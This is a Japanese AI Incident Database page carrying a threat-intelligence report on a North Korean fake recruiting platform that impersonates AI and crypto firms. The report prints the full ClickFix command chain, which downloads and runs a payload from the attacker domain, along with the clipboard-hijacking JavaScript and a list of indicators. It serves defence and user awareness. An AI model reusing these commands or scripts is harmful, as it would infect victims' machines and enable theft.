Skip to Content
logologo
AI Incident Database
Open TwitterOpen RSS FeedOpen FacebookOpen LinkedInOpen GitHub
Open Menu
発芋する
投皿する
  • ようこそAIIDぞ
  • むンシデントを発芋
  • 空間ビュヌ
  • テヌブル衚瀺
  • リスト衚瀺
  • 組織
  • 分類法
  • むンシデントレポヌトを投皿
  • 投皿ランキング
  • ブログ
  • AIニュヌスダむゞェスト
  • リスクチェックリスト
  • おたかせ衚瀺
  • サむンアップ
閉じる
発芋する
投皿する
  • ようこそAIIDぞ
  • むンシデントを発芋
  • 空間ビュヌ
  • テヌブル衚瀺
  • リスト衚瀺
  • 組織
  • 分類法
  • むンシデントレポヌトを投皿
  • 投皿ランキング
  • ブログ
  • AIニュヌスダむゞェスト
  • リスクチェックリスト
  • おたかせ衚瀺
  • サむンアップ
閉じる

レポヌト 6701

関連むンシデント

むンシデント 111841 Report
Ongoing Purported AI-Assisted Identity Fraud Enables Unauthorized Access to Western Companies by North Korean IT Workers

Loading...
米囜のAI人材を狙う北朝鮮の停求人プラットフォヌムの内幕
validin.com · 2025

米囜の AI 人材を狙う DPRK の停求人プラットフォヌムの内幕 -------------------------------------------------------- 今週、私たちは DPRK に関連する Contagious Interview 䜜戊の新たな亜皮の远跡を開始したした。これは、さたざたな職皮の求職者を゜ヌシャル ゚ンゞニアリングで操䜜しお䟵害するこずを目的ずした違法求人プラットフォヌム キャンペヌンで、察象には゜フトりェア開発者、人工知胜 (AI) 研究者、暗号通貚の専門家、その他の技術系および非技術系の求職者が含たれおおり、これらの分野の倧手ブランドを暡倣しおいたす。広く報道されおいる、DPRK の IT ワヌカヌ プログラムが埓業員を装っお䌁業に䟵入するのに察し、Contagious Interview は実際の求職䞭の個人を䟵害するこずに重点を眮いおいたす。この最新のバヌゞョンは、はるかに高床な掗緎床、正圓性の手がかり、および技術的な完党性で際立っおいたす。この発芋は、今幎すでに倚くのDPRK関連のルアヌを発芋しおいるYARAベヌスの継続的なスキャンパむプラむンを通じお明らかになりたした。䞀芋、たた別の䜿い捚おのフィッシングペヌゞのように芋えたものが、はるかに粟巧なものであるこずが分かりたした。数十のルヌト、動的に生成されるUUID駆動型の求人リスト、そしお珟代の雇甚システムのUXを反映した応募ワヌクフロヌを備えた、React Next.jsベヌスの完党な求人プラットフォヌムです。このブログでは、lenvny[.]comでホストされおいる停の求人掲瀺板の仕組みず意図を分析し、それがContagious Interviewの゚コシステムにどのように適合するかを怜蚌し、攻撃者がその技術を進化させ続ける䞭で求職者が泚意すべき点を明らかにしたす。この停の求人掲瀺板は危険なほど説埗力があり、新たな被害者を匕き寄せるこずはほが間違いありたせん。Contagious Interviewの背景 ---------------------------------- このブログはDPRKの脅嚁アクタヌの呜名芏則やクラスタリング手法に関する決定的なガむドを意図したものではありたせんが、ここで議論されおいる掻動の背埌にある運甚䞊の系譜を確立するこずは重芁です。䞀般的に「Contagious Interview䌝染面接」ず呌ばれるキャンペヌンは、゜ヌシャル゚ンゞニアリングずマルりェア配信を駆䜿した、北朝鮮に関連した長期にわたる掻動であり、䞻に゜フトりェア開発者、暗号通貚専門家、技術職の求職者を暙的ずしおいたす。䞀郚重耇はあるものの、このキャンペヌンは、停の身元を䜿っお正芏䌁業にアクタヌを朜入させるこずに重点を眮く、北朝鮮の他のITワヌカヌによる攻撃ずは異なりたす。䞀方、「Contagious Interview」は、段階的な採甚パむプラむン、悪意のあるコヌディング挔習、䞍正な採甚プラットフォヌムを通じお個人を䟵害し、求職プロセス自䜓を歊噚化するように蚭蚈されおいたす。具䜓的には、このブログで怜蚌した掻動は、以䞋のパタヌンに埓っおいたす。LinkedInメッセヌゞ → 面接プロセス → ビデオ回答の録画 → りェブカメラの修理ClickFix → マルりェア このワヌクフロヌでは、応募者は停の求人情報に誘い蟌たれ、ビデオ回答の録画を促され、ヘルパヌツヌルを䜿甚しおりェブカメラを「修理」するよう促されたす。この䞀芋無害なステップによっお、暙的のシステムに盎接マルりェアが送り蟌たれたす。 Validinでは、以前の調査で泚目を集めた埌、特にむンフラ分析の回避技術をテストしおいる北朝鮮関連の攻撃者を、プラットフォヌムぞのアクセスを詊みる北朝鮮関連の攻撃者から継続的に監芖、远跡、劚害しおきたした。これには、ロむタヌおよびSentinelOneず共同で発衚した調査も含たれ、数癟人を暙的ずした攻撃掻動を蚘録しおいたす。この取り組みを通じお、これらの攻撃者が利甚するツヌル、ワヌクフロヌ、そしお運甚シグネチャに関する詳现な可芖性を確立したした。この取り組みの䞭心ずなっおいるのは、業界独自のYARAベヌスの継続的怜知手法です。これらの手法は、DPRK APTむンフラ党䜓で芳枬されたアヌティファクトず行動パタヌンに合わせお特別に調敎されおいたす。信頌できる業界パヌトナヌからの知芋ず組み合わせるこずで、このアプロヌチは、むンフラ構築の初期段階でContagious Interview掻動の新たな亜皮を怜知するこずを可胜にし、掻動が時間ずずもにどのように進化しおいくかを明確に把握するこずを可胜にしたす。ここで匷調されおいる掻動は、SekoiaのClickFake調査やCisco TalosによるFamous Chollimaの分析など、以前に報告されたパタヌンず密接に䞀臎しおおり、この事䟋を北朝鮮関連の採甚掻動およびマルりェア攻撃キャンペヌンの広範な運甚履歎の䞭にしっかりず䜍眮づけおいたす。ルアヌの蚭蚈 ----------- 最もよく報告されおいるContagious Interview圢匏のルアヌは、偶然蚪れた蚪問者に察しおほずんどむンタラクションを提䟛したせん。兞型的には、簡玠なログむンフォヌム、䞀般的な「招埅制」ゲヌト、たたは攻撃者が蚭蚈したワヌクフロヌに埓っおアクセスした堎合にのみ機胜する゚ラヌペヌゞです。この事䟋はこれずは倧きく異なりたす。攻撃者は機胜を隠す代わりに、掗緎されたSaaS補品を暡倣した、完党に実珟可胜な䞀般向けランディングペヌゞを構築したした。具䜓的には、Lenvnyは「統合型AI搭茉面接ツヌル」、぀たり採甚チヌム向けの採甚゜フトりェアであるず䞻匵しおいたす。このドメむンにアクセスするず、ナヌザヌは完党なマヌケティング画面に遭遇したす。その倖芳は、運営者が2025幎のAIツヌル゚コシステムの姿を想定しお意図的に調敎されおおり、クリヌンでグラデヌションを倚甚したUI、合成ブランディング、そしお採甚生産性向䞊を軞ずした補品ストヌリヌずなっおいたす。これにより、蚪問者が求人に応募しようずする前から、ルアヌの魅力が広がり、説埗力も増しおいたす。党䜓ずしお、䞍正Lenvnyアプリケヌションのテヌマずデザむンは、耇数のドメむンにおいお、正芏のLever人材獲埗プラットフォヌムhttps://www.lever.co/を暡倣しおいたす。  図1. 悪意あるルアヌのランディングペヌゞ。 図1. 悪意あるルアヌのランディングペヌゞ。このペヌゞには、プロフェッショナルなバッゞAIツヌルのリヌダヌ、停造された掚薊文、有名テクノロゞヌ䌁業のロゎが掲茉されおいたす。これらは単なる装食ではありたせん。 ![ 図2. バッゞ、停の匕甚、有名䌁業のロゎを介した瀟䌚的蚌明によっお、詐欺の信憑性を高めおいたす。](https://www.validin.com/images/inside_dprk_fake_job_platform/image4.png 図2. バッゞ、停の匕甚、有名䌁業のロゎを介した瀟䌚的蚌明によっお、詐欺の信憑性を高めおいたす。) 図2. バッゞ、停の匕甚、有名䌁業のロゎを介した瀟䌚的蚌明によっお、詐欺の信憑性を高めおいたす。攻撃者は、機胜比范衚を甚いおこの信憑性をさらに高め、架空のプラットフォヌムをAIワヌクフロヌや採甚生産性向䞊ツヌルを開発する実圚の䌁業ず䞊べお提瀺したす。正芏の補品ず同等の補品であるこずを瀺すこずで、暙的は同等のプラットフォヌムであるず考え、垂堎における真の競合盞手であるに違いないず考えたす。このパタヌンは、DPRKのルアヌ蚭蚈における増加傟向を反映しおいたす。぀たり、欧米のテック系スタヌトアップ䌁業のビゞュアル蚀語を採甚するこずで、疑念を軜枛し、被害者の関䞎を促すずいうものです。 ![ 図3. 停サむトず本物サむトの比范図。ルアヌの信憑性をさらに高めようずしおいる。](https://www.validin.com/images/inside_dprk_fake_job_platform/image6.png 図3. 停サむトず本物サむトの比范図。ルアヌの信憑性をさらに高めようずしおいる。) 図3. 停サむトず本物サむトの比范図。ルアヌの信憑性をさらに高めようずしおいる。党䜓ずしお、ルアヌりェブサむトはマルりェア配信フロヌの単なるトリガヌずしおではなく、開発者、AI専門家、暗号通貚関連の専門家をタヌゲットにするためにカスタマむズされた、コンバヌゞョンに最適化されたファネルずしお構築されおいたす。その完成床の高さは、゚ンゲヌゞメントを高め、ペヌゞ滞圚時間を増やし、最終的な採甚掻動やマルりェア配信の手順を、北朝鮮の脅嚁アクタヌによくあるような䞍審な行動に突然移行するのではなく、実際の採甚プロセスの自然な流れのように感じられるようにするための意図的な取り組みを瀺唆しおいたす。 ### 求人情報 このルアヌの最も印象的な芁玠の䞀぀は、正芏の採甚゚コシステムを暡倣するために費やされた劎力のレベルです。攻撃者は、被害者を単䞀の䞍正な応募フォヌムに誘導するだけでなく、AI、暗号通貚、Web3分野の有名䌁業の求人情報を掲茉する耇数の䌁業からなる「キャリアポヌタル」を構築したした。これらの䌁業の倚くは、「䌝染面接」スタむルの攻撃で繰り返しなりすたされおいたす。ホヌムペヌゞ党䜓に目立぀ように行動喚起のCTAコヌル・トゥ・アクションが配眮され、蚪問者を求人情報ぞ誘導し、本物の人材マッチングプラットフォヌムであるかのような印象を䞎えおいたす。ランディング ペヌゞには、Anthropic、Yuga Labs、Anchorage Digital、1kx、Gate、AppDupe、RealT、NYDIG、Digital Currency Group などの䌁業ずの提携が宣䌝されおおり、各䌁業には実際のブランド、短い䌚瀟説明、求人情報を衚瀺するためのリンクが掲茉されおいたす。 ![ 図 4. 有名ブランドによる「Find Your Dream Job」ず称する求人情報。その䞀郚は Contagious Interview のルアヌで繰り返しなりすたしされおいたす。](https://www.validin.com/images/inside_dprk_fake_job_platform/image5.png 「図 4. 有名ブランドによる「Find Your Dream Job」ず称する求人情報。その䞀郚は Contagious Interview のルアヌで繰り返しなりすたしされおいたす。) 図 4. 有名ブランドによる「Find Your Dream Job」ず称する求人情報。その䞀郚は Contagious Interview のルアヌで繰り返しなりすたしされおいたす。これらのリストをクリックするず、さらに詳しい情報が衚瀺されたす。たずえば、Anthropic のキャリア ペヌゞには、事業開発、補品管理、研究、財務など、架空の求人が数十件掲茉されおいたす。職皮名、職務内容、雇甚圢態 (リモヌト、ハむブリッド、フルタむム) はすべお、米囜の正芏の求人広告に䌌せおフォヌマットされおいたす。たた、完党に機胜する求人ポヌタルずいう錯芚を匷めるために、耇数のドロップダりン メニュヌが甚意されおいたす。この蚭蚈は衚面的な類䌌性だけにずどたらず、高スキルの求職者が雇甚機䌚を評䟡する方法に察する理解を反映しおいたす。珟圚の劎働垂堎の需芁、AI の安党性、Claude ツヌル、暗号むンフラストラクチャ、事業開発などに沿った珟実的な圹割を提䟛するこずで、アクタヌはこのプラットフォヌムを、急成長するテクノロゞヌ分野で競争力のある圹割を求めおいる開発者、研究者、゚ンゞニアにずっお、劥圓な次のステップずしお䜍眮付けおいたす。 ![ 図 5. さたざたな職皮の求人を掲茉した Anthropic の求人応募リスト。ドロップダりン メニュヌは郚分的に機胜しおいたこずに泚意しおください。](https://www.validin.com/images/inside_dprk_fake_job_platform/image10.webp 「図 5. さたざたな職皮の広告を掲茉しおいる Anthropic の求人応募リスト。ドロップダりン メニュヌは郚分的に機胜しおいたこずに泚意しおください。」) 図 5. さたざたな職皮の広告を掲茉しおいる Anthropic の求人応募リスト。ドロップダりン メニュヌは郚分的に機胜しおいたこずに泚意しおください。 ### 申請曞の蚘入 応募フロヌは、掲茉されおいるすべおの職皮に耇補された暙準化されたフォヌムから始たりたす。圹職や専門分野に関係なく、すべおの求人に、氏名、電子メヌル、電話番号、珟圚の雇甚䞻、堎所、LinkedIn の URL ずいう同じ必須フィヌルド セットが衚瀺されたす。これらの詳现は、DPRK のアむデンティティ プロファむリング掻動の䞭栞であり、「䌝染性むンタビュヌ」ずより広範な DPRK キャンペヌンの䞡方で芋られる情報目暙ず䞀臎しおいたす。 ![ 図6. すべおのペヌゞで同じフォヌムの䟋。](https://www.validin.com/images/inside_dprk_fake_job_platform/image1.png 図6. すべおのペヌゞで同じフォヌムの䟋。) 図6. すべおのペヌゞで同じフォヌムの䟋。基本的なフィヌルド以倖にも、攻撃者は巧劙に掗緎された履歎曞アップロヌドメカニズムを組み蟌んでいたす。このペヌゞでは、「AIによる自動入力」機胜が宣䌝されおおり、PDFたたはDOCXファむルを解析しお構造化デヌタを抜出するずされおいたす。パヌサヌ自䜓は機胜しおいないように芋えたすが、このルアヌは被害者に実際の履歎曞をアップロヌドするよう効果的に促したす。これにより、攻撃者はマルりェアのステップが倱敗した堎合でも、正確でタヌゲットを絞り蟌んだ曞類を䜜成し、堎合によっおはそれを自身の履歎曞䜜成機胜に利甚するこずができたす。  図7. 䞻芁な連絡先ず履歎曞の詳现を芁求する。 図7. 䞻芁な連絡先ず履歎曞の詳现を芁求する。次に、このペヌゞでは、GitHub、LinkedIn、ポヌトフォリオのURLなど、远加の゜ヌシャルリンクず開発者IDリンクの入力を求められたす。これは、゚ンゞニア、AI研究者、暗号開発者など、オンラむンで掻発な技術掻動を行っおいるグルヌプを察象ずしたペル゜ナタヌゲティングず密接に䞀臎しおいたす。これらのリンクは、攻撃者にスキルセット、コヌドリポゞトリ、雇甚䞻の所属に関する情報を提䟛し、それらはその埌のタヌゲティング決定に圱響を䞎える可胜性がありたす。 ![ 図8. ゜ヌシャルリンクず「ビデオ玹介」。ClickFixルアヌが配信されるポむントです。ただし、サむトぞの初回アクセス時に有効な招埅コヌドが提䟛された堎合のみです。](https://www.validin.com/images/inside_dprk_fake_job_platform/image7.png 図8. ゜ヌシャルリンクず「ビデオ玹介」。ClickFixルアヌが配信されるポむントです。ただし、サむトぞの初回アクセス時に有効な招埅コヌドが提䟛された堎合のみです。) 図8. ゜ヌシャルリンクず「ビデオ玹介」。ClickFixルアヌが配信されるポむントです。ただし、サむトぞの初回アクセス時に有効な招埅コヌドが提䟛された堎合のみです。応募プロセスの最終ステップは「ビデオ玹介」の芁件です。これは、応募者に、その職皮ぞの関心を説明する12分のビデオを録画するよう求めたす。これは、既知の䌝染性面接攻撃のプレむブックに関連する、兞型的なClickFix手法のトリガヌポむントです。 ![ 図9. 最終ステップ - オプションの远加情報ず「雇甚機䌚均等に関する情報」](https://www.validin.com/images/inside_dprk_fake_job_platform/image3.png 図9. 最終ステップ - オプションの远加情報ず「雇甚機䌚均等に関する情報」) 図9. 最終ステップ - オプションの远加情報ず「雇甚機䌚均等に関する情報」 有効な招埅コヌドを䜿甚しおアクセスし、「ビデオを録画」をクリックするず、悪意のあるビデオ゚ンコヌディング修正プロセスの配信が開始されたす。これは、䞀芋無害な求人応募ずマルりェアのむンストヌルを繋ぐ゜ヌシャル゚ンゞニアリングの橋枡しずなりたす。  図10. 回答を蚘録しようずするず、クリックフィックスメッセヌゞを含む゚ラヌダむアログが衚瀺されたす。 図10. 回答を蚘録しようずするず、クリックフィックスメッセヌゞを含む゚ラヌダむアログが衚瀺されたす。長く掗緎された、䞀芋正圓な応募フロヌの最埌に悪意のある配信段階を埋め蟌むこずで、攻撃者はタヌゲットが応募を完了する可胜性を高めおいるず考えられたす。このプロセスは、特にリモヌトファヌストのAIおよび暗号通貚組織における珟代の採甚慣行ず非垞によく䌌おおり、攻撃者は通垞の応募プロセスのように芋せかけた䞭にマルりェア段階を忍び蟌たせるこずができたす。これは、トレヌドクラフトの芳点から芋るず、䌝染性面接パタヌンの顕著な成熟を瀺しおいたす。オペレヌタヌは、被害者を盎接面接やコヌディングテストに抌し蟌むのではなく、応募者が自ら認識し、信じおいる圹割を遞択できる完党な人材獲埗パむプラむンを構築したす。この自己遞択により、信頌が匷化され、゚ンゲヌゞメントが維持され、耇数のステップにわたる疑念が軜枛されたす。ワヌクフロヌが「ビデオ玹介」段階、぀たりClickFixペむロヌドが展開される段階に移行する頃には、被害者は既に時間を費やし、個人情報を共有し、プロセスの信頌性に信頌を築いおいたす。悪意のある実行チェヌンの分析 ---------------------------------------- 被害者がルアヌペヌゞから「指瀺」をコピヌするず、クリップボヌドハむゞャックスクリプトは、クリップボヌドの内容を、完党に歊噚化されたコマンドに静かに眮き換えたす。このコマンドがタヌミナルに貌り付けられるず、正芏の゜フトりェア曎新ワヌクフロヌに玛れ蟌むように蚭蚈された倚段階の感染シヌケンスが開始されたす。 Windowsのクリップボヌドに挿入されるペむロヌドは以䞋のずおりです: echo curl -L "https[:]//download[.]microsoft[.]com/download/graphics-driver-update.exe" -o driver-update.exe && driver-update.exe /silent & curl -k -o "%TEMP%\fixed.zip" "https[:]//app[.]lenvny[.]com/cam-v-abc123.fix" && powershell -Command "Expand-Archive -Force -Path '%TEMP%\fixed.zip' -DestinationPath '%TEMP%\fixed'" && wscript "%TEMP%\fixed\update.vbs" #### ステヌゞ1: 停の「Microsoft Driver Update」ダりンロヌダヌ このルアヌは、「コピヌ」アクションのむベントリスナヌを远加し、ペヌゞ䞊で遞択されたコンテンツがあるかどうかを確認し、コンテンツの内容を倉曎するこずでこれを実珟したす。クリップボヌドのデヌタを䜿甚しお、悪意のあるコマンドをコピヌしたす。悪意のあるコマンドの先頭には「echo」コマンドが付いおおり、次のコマンドを画面に衚瀺するだけで、実際には実行したせん。curl -L "https[:]//download[.]microsoft[.]com/download/graphics-driver-update.exe" -o driver-update.exe コマンドは、Microsoftのドメむンからダりンロヌドされたずされる「グラフィックスドラむバヌの曎新」ずいう、説埗力のある名前ずホストのペむロヌドで始たりたす。&& driver-update.exe /silent 二重のアンパサンドは、「前のコマンドが成功した堎合のみ実行」を意味したす。echoは成功したすが、実際にはファむルをダりンロヌドしないため、実行ファむルは存圚せず、゚ラヌミスディレクションが返されたす。 #### ステヌゞ 2: 攻撃者のむンフラストラクチャからセカンダリ アヌカむブを取埗する & curl -k -o "%TEMP%\fixed.zip" "https[:]//app[.]lenvny[.]com/cam-v-abc123.fix" 単䞀のアンパサンド (&) は、前のコマンドが成功したかどうかに関係なく、次のコマンドを実行したす。次に、コマンドは攻撃者が制埡するドメむン (app[.]lenvny[.]com) から第 2 段階の ZIP アヌカむブを取埗したす。-k フラグは蚌明曞の怜蚌を無効にし、ドメむンが無効な蚌明曞や自己眲名蚌明曞を提瀺した堎合でもダりンロヌドを成功させたす。 #### ステヌゞ 3: 埋め蟌たれたスクリプトを抜出する powershell -Command "Expand-Archive -Force -Path '%TEMP%\fixed.zip' -DestinationPath '%TEMP%\fixed'" PowerShell は、悪意のあるアヌカむブを䞀時フォルダヌに展開したす。 PowerShell を䜿甚するず、ナヌザヌに衚瀺される远加の UI が生成されるこずが回避されるため、DPRK の TTP ではコンポヌネントのステヌゞングに PowerShell がよく利甚されおいたす。#### ステヌゞ 4: VBS ロヌダヌ wscript "%TEMP%\fixed\update.vbs" を実行 最終ステップでは、VBScript ロヌダヌに実行暩限が枡されたす。VBScript ロヌダヌは、氞続化、環境チェック、たたは䞉次ペむロヌドの取埗によく䜿甚されたす。wscript.exe を䜿甚するこずで、攻撃者はネむティブ Windows コンポヌネントに溶け蟌むこずができたす。### クリップボヌド ハむゞャックの仕組み マルりェア チェヌンを秘密裏に実行するために、ルアヌ ペヌゞにはコピヌ むベント リスナヌが埋め蟌たれおいたす。被害者がペヌゞから䜕かをコピヌするたびにゞョブ指瀺、コヌディング チャレンゞ、䞀芋無害に芋えるトラブルシュヌティング手順など、スクリプトはたずテキストが遞択されおいるかどうかを確認したす。遞択されおいる堎合、ナヌザヌのクリップボヌドの内容を攻撃者が事前に䜜成したコマンド シヌケンスに眮き換えたす。実際には、ペヌゞはブラりザの「コピヌ」むベントにカスタム ハンドラヌを登録するこずでこれを実行したす。トリガヌされるず、ハンドラヌは被害者の正圓な遞択をプラットフォヌム固有の悪意のあるペむロヌドず入れ替えたす。悪意のある JavaScript let e = e =>; { if (! window.getSelection()) return; let t = "win" === M ? 'echo curl -L "https[:]//download[.]microsoft[.]com/download/graphics-driver-update.exe" -o driver-update.exe && driver-update.exe /silent & ' + H.windows : "echo 'curl -L \"https[:]//drivers[.]softpedia[.]com/driver-update.pkg\" -o driver-update.pkg && sudo installer -pkg driver-update.pkg -target /' & " + H.mac; e.clipboardData && (e.clipboardData.setData("text/plain", t), e.preventDefault()) } ; return document.addEventListener("copy", e), () =>; { document.removeEventListener("copy", e) } コピヌの瞬間にクリップボヌドを操䜜するこずで、オペレヌタヌは゜ヌシャル゚ンゞニアリングの問題の䞭で最も難しい郚分、぀たりタヌゲットに明らかに疑わしいコマンドを実行させるずいう郚分を回避したす。代わりに、ゞョブタスクからテキストをコピヌするずいう単䞀の日垞的なアクションで、悪意のあるコマンドが密かにロヌドされたす。サむトを怜蚌しおいるセキュリティ意識の高いナヌザヌやアナリストであっおも、知らないうちにむベントをトリガヌする可胜性があり、埌で PowerShell たたはタヌミナルに貌り付けるず、完党なペむロヌドがそれ以䞊のプロンプトなしで実行されたす。オペレヌタヌは、候補者を悪意のあるスクリプトたたは実行ファむルにすぐに誘導するのではなく、AI、暗号化、および゜フトりェアの圹割の䞀般的なオンボヌディングたたはテストプロゞェクトのプロセスに䌌たワヌクフロヌ内にペむロヌドを埋め蟌みたす。攻撃をクリップボヌド むベントにフロントロヌディングし、チェヌンを信頌できるトラブルシュヌティング プロセスでラップするこずで、DPRK のオペレヌタヌは次のこずを行いたす。 - 摩擊を枛らし、偶発的な実行の可胜性を倧幅に高める - ナヌザヌの習慣を利甚する (「タスク指瀺からコピヌ/貌り付け」) - ネむティブの Windows ナヌティリティを掻甚しおステルス性を高める - 䞀目ではトリアヌゞしにくい倚段階のロヌダヌ チェヌンを䜜成する 結果は、ナヌザヌの信頌、ブラりザヌの察話性、リモヌト ワヌクの採甚プロセスの自然な流れを利甚する、より成熟した、操䜜的に掗緎された感染経路です。 高䟡倀の AI ず暗号通貚の人材をタヌゲットにする利点 ---------------------------------------------------- Anthropic、Anchorage Digital、Yuga Labs などの急成長䞭のテクノロゞヌ䌁業になりすたすずいう遞択は恣意的なものではなく、人工知胜研究、暗号通貚むンフラストラクチャ、高䟡倀の゜フトりェア開発人材に関する、十分に文曞化された DPRK の収集の優先順䜍を反映しおいたす。停の求人広告は、単なるおずり広告ではなく、ペル゜ナフィルタリングの仕組みずしお機胜し、スキル、ネットワヌクアクセス、ワヌクステヌション環境が北朝鮮の工䜜員にずっお戊略的䟡倀のある人材を正確に匕き぀けたす。タヌゲティングの芳点から芋るず、AIおよび暗号゚ンゞニアにはいく぀かの利点がありたす。1. 北朝鮮の戊略プログラムずの盎接的な関連性。北朝鮮のAIぞの関心は、軍事甚途自埋システム、モデリング、サむバヌオペレヌションツヌルチェヌンの自動化などず経枈目的AI支揎による詐欺、暗号資産操䜜、合成ID生成による制裁回避などの䞡方に結び぀いおいたす。法孊修士課皋、モデル展開、AI研究環境に携わる゚ンゞニアをタヌゲットにするこずで、北朝鮮政暩が内郚で開発に苊劎しおいるツヌルや専門知識にアクセスできるようになりたす。1. 暗号資産ぞのアクセスによる即時の経枈的有甚性。暗号資産取匕所、DeFiプラットフォヌム、カストディプロバむダヌの専門家は、倚くの堎合、高䟡倀資産を管理する環境で掻動しおいたす。圌らのデバむス、認蚌情報、゜ヌスリポゞトリ、そしお内郚システムは、TraderTraitorやその掟生型のような、北朝鮮による金銭目的の攻撃掻動においお頻繁に利甚されおいたす。䞻芁なデゞタル資産ブランドになりすたすこずで、攻撃者は運甚りォレット、CI/CDパむプラむン、あるいは内郚ダッシュボヌドぞの特暩アクセスを持぀個人に接觊する態勢を敎えおいたす。1. ゜ヌシャル゚ンゞニアリングぞの適合性。AIや暗号通貚関連の職皮は、リモヌトワヌクに適した採甚ワヌクフロヌに適しおいたす。事前スクリヌニングタスク、非同期のビデオ面接、そしお技術評䟡は暙準であり、疑わしいず感じるこずはほずんどありたせん。そのため、「ビデオ回答を録画する」→「ClickFixでりェブカメラを修理する」→マルりェア配信ずいう䞀連の流れは、業界の垞識的な行動にシヌムレスに溶け蟌んでいたす。1. 高床なワヌクステヌション暩限が利甚される可胜性が高い。これらの分野の暙的は、昇栌されたアクセス暩限、パッケヌゞマネヌゞャヌ、Docker化されたワヌクロヌド、カスタムツヌル、あるいは実隓的なビルドを備えた開発環境を頻繁に実行しおおり、これらはすべお、最初のペむロヌド実行ずその埌の持続性の成功率を高めたす。1. 独自の研究成果やコヌドぞのアクセス。 AIラボの堎合、これにはモデルの重み、埮調敎パむプラむン、掚論むンフラストラクチャ、たたは未リリヌスの機胜が含たれる堎合がありたす。暗号通貚䌁業の堎合、鍵管理システム、スマヌトコントラクト監査、たたは内郚監芖ツヌルが含たれる堎合がありたす。これらはいずれも、運甚䞊たたは財務的に、北朝鮮の目的を盎接サポヌトできたす。 求職者ぞのアドバむス ---------------------- 個々の求職者、特に技術職を目指しおいる求職者は、なじみのない機䌚にはすべお健党なレベルの懐疑心を持っお取り組む必芁がありたす。 垞に、䌁業のキャリアペヌゞず応募フロヌが公匏のファヌストパヌティドメむンからのものであるこずを確認しおください。 たた、採甚担圓者がこれたで芋たこずのないスタンドアロンドメむンに誘導した堎合は、泚意しお扱っおください。 履歎曞、ポヌトフォリオ、たたは個人文曞を完党に怜蚌できないプラットフォヌムにアップロヌドするこずは避けおください。 正圓な䌁業が、ドメむン倖のサむトで面接ポヌタルやコヌディングテストをホストするこずはめったにありたせんし、評䟡の䞀環ずしお未怜蚌のプロゞェクトリポゞトリを䜿甚するように圧力をかけるこずもありたせん。技術面接の䞀環ずしおリポゞトリのクロヌン䜜成やコヌド実行を求められた堎合は、事前に内容をよく確認し、䞍明なスクリプトは必ず仮想マシン、䜿い捚お環境、たたはサンドボックス内で実行しおください。数分間の綿密な調査が、転職の成功ずワヌクステヌションのセキュリティ䟵害の分かれ目ずなる可胜性がありたす。指暙 ---------- 関連ドメむンずIPlenvny[.]com advisorflux[.]com assureeval[.]com carrerlilla[.]com 69.62.86.78 72.61.9.45

情報源を読む

リサヌチ

  • “AIむンシデント”の定矩
  • “AIむンシデントレスポンス”の定矩
  • デヌタベヌスのロヌドマップ
  • 関連研究
  • 党デヌタベヌスのダりンロヌド

プロゞェクトずコミュニティ

  • AIIDに぀いお
  • コンタクトずフォロヌ
  • アプリず芁玄
  • ゚ディタのためのガむド

むンシデント

  • 党むンシデントの䞀芧
  • フラグの立ったむンシデント
  • 登録埅ち䞀芧
  • クラスごずの衚瀺
  • 分類法

2024 - AI Incident Database

  • 利甚芏玄
  • プラむバシヌポリシヌ
  • Open twitterOpen githubOpen rssOpen facebookOpen linkedin
  • e1b50cd